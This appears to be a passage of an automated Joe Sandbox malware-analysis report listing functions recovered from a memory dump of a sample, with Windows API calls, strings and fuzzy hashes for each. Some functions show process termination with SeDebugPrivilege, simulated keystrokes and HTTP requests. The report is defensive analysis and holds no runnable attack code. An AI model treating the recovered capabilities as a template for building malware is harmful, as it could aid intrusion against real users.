SystemTimeToFileTime.KERNEL32(?,?), ref: 00608BC1
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00608BCD
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00608C6A
SetCurrentDirectoryW.KERNEL32(?), ref: 00608C7E
SetCurrentDirectoryW.KERNEL32(?), ref: 00608CB0
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00608CE6
SetCurrentDirectoryW.KERNEL32(?), ref: 00608CEF

Strings

*.*, xrefs: 00608CF5

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: ceaffe8751acc04c4898d7cd385af09cfbeae82e4593c56182dc7da3af8bd747
Instruction ID: f532f47bde1e1e7f6e476e7e4c644fa2fd9d84a5f43be9c74c932634562f0215
Opcode Fuzzy Hash: ceaffe8751acc04c4898d7cd385af09cfbeae82e4593c56182dc7da3af8bd747
Instruction Fuzzy Hash: 01616CB25047069FDB14EF20C8499AFB7E9FF89310F04891DF98997291DB31EA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 006245A5 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 006245D8
SetMenu.USER32(?,00000000), ref: 006245E7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0062466F
IsMenu.USER32(?), ref: 00624683
CreatePopupMenu.USER32 ref: 0062468D
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006246BA
DrawMenuBar.USER32 ref: 006246C2

Strings

F, xrefs: 006246AD
0, xrefs: 006245B3

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 34710669bf040c57fda46339a6b623e7d246c4dde1a12d1e3aecfa4198c43a96
Instruction ID: eb06c4778995e3de5349804548257190a8e54628f807645288a2c8a65a991689
Opcode Fuzzy Hash: 34710669bf040c57fda46339a6b623e7d246c4dde1a12d1e3aecfa4198c43a96
Instruction Fuzzy Hash: 03414B7560161AEFDF24CF65E854AEA7BB6FF4A314F140028FA45AB350DB70A921CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005F276F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 005F27F4
GetDlgCtrlID.USER32 ref: 005F27FF
GetParent.USER32 ref: 005F281B
SendMessageW.USER32(00000000,?,00000111,?), ref: 005F281E
GetDlgCtrlID.USER32(?), ref: 005F2827
GetParent.USER32(?), ref: 005F283B
SendMessageW.USER32(00000000,?,00000111,?), ref: 005F283E

Strings

ComboBox, xrefs: 005F277C
ListBox, xrefs: 005F27B1

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: e6ee18b1516d8e635c922dccbd7a9e2da609a2ed65a06d21e511580c2d6edcc6
Instruction ID: 3715a7cb853712f01dccf3522b2bbdda95f3602b4f940820da31a7833b5caf95
Opcode Fuzzy Hash: e6ee18b1516d8e635c922dccbd7a9e2da609a2ed65a06d21e511580c2d6edcc6
Instruction Fuzzy Hash: 8421C5B4900219BBDF15AFA0DC85EFEBF76FF45350F100115BA51972A5CB784809DB60

Uniqueness

Uniqueness Score: -1.00%

Function 005F2850 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 005F28D3
GetDlgCtrlID.USER32 ref: 005F28DE
GetParent.USER32 ref: 005F28FA
SendMessageW.USER32(00000000,?,00000111,?), ref: 005F28FD
GetDlgCtrlID.USER32(?), ref: 005F2906
GetParent.USER32(?), ref: 005F291A
SendMessageW.USER32(00000000,?,00000111,?), ref: 005F291D

Strings

ComboBox, xrefs: 005F285D
ListBox, xrefs: 005F2892

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 7d24cfb572e380bc61f29f6d278960211eca476af3f0bbdc20d711ce039e96de
Instruction ID: f7ee844b6b1d34d0ae0e7eb199ef1c2af9e94ee7e2a3b213f504c6fa760fb473
Opcode Fuzzy Hash: 7d24cfb572e380bc61f29f6d278960211eca476af3f0bbdc20d711ce039e96de
Instruction Fuzzy Hash: DB21C2B5900218BBEF11AFA0DC49EFEBFBAFF05340F004015BA51A3295D7784859DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00624382 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006243FC
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006243FF
GetWindowLongW.USER32(?,000000F0), ref: 00624426
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00624449
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006244C1
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 0062450B
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00624526
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00624541
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00624555
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00624572

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 63c6dc58072c0792d551fc9eec1758db6882e0220e95142d58d48847bce7cdda
Instruction ID: 183a86263f3c230227500cf18e685e22b5d268ab46bc2d5790465c208788a46b
Opcode Fuzzy Hash: 63c6dc58072c0792d551fc9eec1758db6882e0220e95142d58d48847bce7cdda
Instruction Fuzzy Hash: 8861AA75900618AFDB21CFA8DC81EEE77F9EB49710F104169FA54AB3A1CB70AA45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0060CBB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0060CBCF
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0060CBF7
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0060CC27
GetLastError.KERNEL32 ref: 0060CC7F
SetEvent.KERNEL32(?), ref: 0060CC93
InternetCloseHandle.WININET(00000000), ref: 0060CC9E

Strings

, xrefs: 0060CC18

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 1ef9194e100a9597d6c9e3262b3af78bed73e68952ed95e549a64543c2030360
Instruction ID: f755082e0df831f87c8d98cf24122d8c78ab656c00cc300bb72cc9c13d4745e2
Opcode Fuzzy Hash: 1ef9194e100a9597d6c9e3262b3af78bed73e68952ed95e549a64543c2030360
Instruction Fuzzy Hash: 3131C0B1540704AFE7259F60CD88AAB7BFEEF49754B10461EF44AD2280DB34D9059B60

Uniqueness

Uniqueness Score: -1.00%

Function 005FA12A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005D5437,?,?,Bad directive syntax error,0062DCD0,00000000,00000010,?,?), ref: 005FA14B
LoadStringW.USER32(00000000,?,005D5437,?), ref: 005FA152

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 005FA216

Strings

Line %d (File "%s"):, xrefs: 005FA1BC
Error: , xrefs: 005FA1E4
Line %d:, xrefs: 005FA1A1
., xrefs: 005FA1FC
%s (%d) : ==> %s.: %s %s, xrefs: 005FA180

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: b755c44c9e86335b7c1898d08ffd3f27e49b4b75427f9d8b9ddf635e271e7c1f
Instruction ID: aca5ef1b9cf1aa76e98100ad15bd1a6b7dcc81f4a659deb37753b93abb9cc842
Opcode Fuzzy Hash: b755c44c9e86335b7c1898d08ffd3f27e49b4b75427f9d8b9ddf635e271e7c1f
Instruction Fuzzy Hash: A3218B7290021EAFDF11AF90DC0AEFE7B7ABF58304F054455FA09660A2DB759A18DB11

Uniqueness

Uniqueness Score: -1.00%

Function 005F292F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 005F293B
GetClassNameW.USER32(00000000,?,00000100), ref: 005F2950
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005F29DD

Strings

details, xrefs: 005F298B
largeicons, xrefs: 005F2971
smallicons, xrefs: 005F29A5
list, xrefs: 005F29BF
SHELLDLL_DefView, xrefs: 005F295C

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 1b20b43f81a5718660a4167aee0f6dee511643cd1a371867faa88e440115c444
Instruction ID: cbeb145f5af67f3255dee01829c67055bd95aad2eeb2c6fbc773727ef5f412e4
Opcode Fuzzy Hash: 1b20b43f81a5718660a4167aee0f6dee511643cd1a371867faa88e440115c444
Instruction Fuzzy Hash: 8111E3B624470BBAFB102220DC0BDF63F9DAF05721F600112FE40E60D2EAA968959955

Uniqueness

Uniqueness Score: -1.00%

Function 005CD230 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 005CD257
_free.LIBCMT ref: 005CD2C2
_free.LIBCMT ref: 005CD2E8
_free.LIBCMT ref: 005CD311
_free.LIBCMT ref: 005CD349
_free.LIBCMT ref: 005CD37A
_free.LIBCMT ref: 005CD3BB
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 005CD43C
_free.LIBCMT ref: 005CD455

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 4615c32238690b41593830d306ce810754809e9643cee2b62f903e393d1fa75b
Instruction ID: c524ff5b8f7b9406e7dfa0e29ddd5b55393fe26a7e3392839607d19404e3d0b1
Opcode Fuzzy Hash: 4615c32238690b41593830d306ce810754809e9643cee2b62f903e393d1fa75b
Instruction Fuzzy Hash: 1461F672900346BFDF25AFE49885F697FB4BF42720F08057EE905EB281E6B1D84187A1

Uniqueness

Uniqueness Score: -1.00%

Function 0060CAA0 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0060CADF
GetLastError.KERNEL32 ref: 0060CAF2
SetEvent.KERNEL32(?), ref: 0060CB06

Part of subcall function 0060CBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0060CBCF
Part of subcall function 0060CBB0: GetLastError.KERNEL32 ref: 0060CC7F
Part of subcall function 0060CBB0: SetEvent.KERNEL32(?), ref: 0060CC93
Part of subcall function 0060CBB0: InternetCloseHandle.WININET(00000000), ref: 0060CC9E

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 5db90016617efce87dd7ff3da4be3eb8e00f41617f20d4c70fb9edb31740b301
Instruction ID: 670506508831e312071a31b620fa01eacdc961a72c13e91e471be6a2987309db
Opcode Fuzzy Hash: 5db90016617efce87dd7ff3da4be3eb8e00f41617f20d4c70fb9edb31740b301
Instruction Fuzzy Hash: 6D31AC71240B05AFDB299FA0CD45AA7BBFAFF48320B10461DF95682650D730E816EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005F2E32 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 005F42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F42E6
Part of subcall function 005F42CC: GetCurrentThreadId.KERNEL32 ref: 005F42ED
Part of subcall function 005F42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F2E43), ref: 005F42F4

MapVirtualKeyW.USER32(00000025,00000000), ref: 005F2E4D
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005F2E6B
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 005F2E6F
MapVirtualKeyW.USER32(00000025,00000000), ref: 005F2E79
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 005F2E91
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 005F2E95
MapVirtualKeyW.USER32(00000025,00000000), ref: 005F2E9F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005F2EB3
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 005F2EB7

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: e39f2e6fe4d33d7dbb176d304060ce22a1556ba7e1d89b09b48ac01cb07f7fd4
Instruction ID: aec6b603792b7dda3fa4d014f32d856d21af46696fe7d33c0c7783c0ab28d24b
Opcode Fuzzy Hash: e39f2e6fe4d33d7dbb176d304060ce22a1556ba7e1d89b09b48ac01cb07f7fd4
Instruction Fuzzy Hash: B801D8313806147BFB206769DC8EF663F5AEB89B11F101011F318AE1E0C9E11455CA69

Uniqueness

Uniqueness Score: -1.00%

Function 005F2093 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,005F1CD9,?,?,00000000), ref: 005F209C
HeapAlloc.KERNEL32(00000000,?,005F1CD9,?,?,00000000), ref: 005F20A3
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005F1CD9,?,?,00000000), ref: 005F20B8
GetCurrentProcess.KERNEL32(?,00000000,?,005F1CD9,?,?,00000000), ref: 005F20C0
DuplicateHandle.KERNEL32(00000000,?,005F1CD9,?,?,00000000), ref: 005F20C3
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005F1CD9,?,?,00000000), ref: 005F20D3
GetCurrentProcess.KERNEL32(005F1CD9,00000000,?,005F1CD9,?,?,00000000), ref: 005F20DB
DuplicateHandle.KERNEL32(00000000,?,005F1CD9,?,?,00000000), ref: 005F20DE
CreateThread.KERNEL32(00000000,00000000,005F2104,00000000,00000000,00000000), ref: 005F20F8

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: a6d95350e7c6b25f22143b520e37bc30e7df7f7b99f4cc24807851a5b381c773
Instruction ID: 6dbee91fd98f2dbd9eb5adebbd4010b5c082d594be321a61beacdc275a22e696
Opcode Fuzzy Hash: a6d95350e7c6b25f22143b520e37bc30e7df7f7b99f4cc24807851a5b381c773
Instruction Fuzzy Hash: C601C9B5640708BFE720EFA5DC8EF6B3BADEB89711F105411FA05DB2A1CA749811CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0061AA41 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 005FDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 005FDCC1
Part of subcall function 005FDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 005FDCCF
Part of subcall function 005FDC9C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 005FDD9C

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0061AACC
GetLastError.KERNEL32 ref: 0061AADF
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0061AB12
TerminateProcess.KERNEL32(00000000,00000000), ref: 0061ABC7
GetLastError.KERNEL32(00000000), ref: 0061ABD2
CloseHandle.KERNEL32(00000000), ref: 0061AC23

Strings

SeDebugPrivilege, xrefs: 0061AAEE

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: 604483d8cf52b089fb9ca7e7fbb29a3cbdbb366c252dc1b59e7bf35c29b55501
Instruction ID: 9d299ca69a05c5635f8cf31a96e6fa2b80c54c3652504dcc678661c62bc75f1f
Opcode Fuzzy Hash: 604483d8cf52b089fb9ca7e7fbb29a3cbdbb366c252dc1b59e7bf35c29b55501
Instruction Fuzzy Hash: FF61C2702096429FD720DF54C498F95BBE6AF44318F18848CE4664B7A3C775EC86CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 006241E5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00624284
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00624299
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006242B3
_wcslen.LIBCMT ref: 006242F8
SendMessageW.USER32(?,00001057,00000000,?), ref: 00624325
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00624353

Strings

SysListView32, xrefs: 00624256

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: e8fa6f20b0a2e76eb6eb7a56eb8fb0151cac5cfeed9685e3941b19f4636f8863
Instruction ID: fb7d71ee9714dff4eea3537baa871c46f4eeb7e814cfa72a5dede3d70d473d89
Opcode Fuzzy Hash: e8fa6f20b0a2e76eb6eb7a56eb8fb0151cac5cfeed9685e3941b19f4636f8863
Instruction Fuzzy Hash: 0341CF31A00729EBDB21DF65DC49BEA7BAAFF48350F10052AF954E7291DB709984CF90

Uniqueness

Uniqueness Score: -1.00%

Function 005FC53A Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005FC5D9
IsMenu.USER32(00000000), ref: 005FC5F9
CreatePopupMenu.USER32 ref: 005FC62F
GetMenuItemCount.USER32(016D59D8), ref: 005FC680
InsertMenuItemW.USER32(016D59D8,?,00000001,00000030), ref: 005FC6A8

Strings

0, xrefs: 005FC584
2, xrefs: 005FC613

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

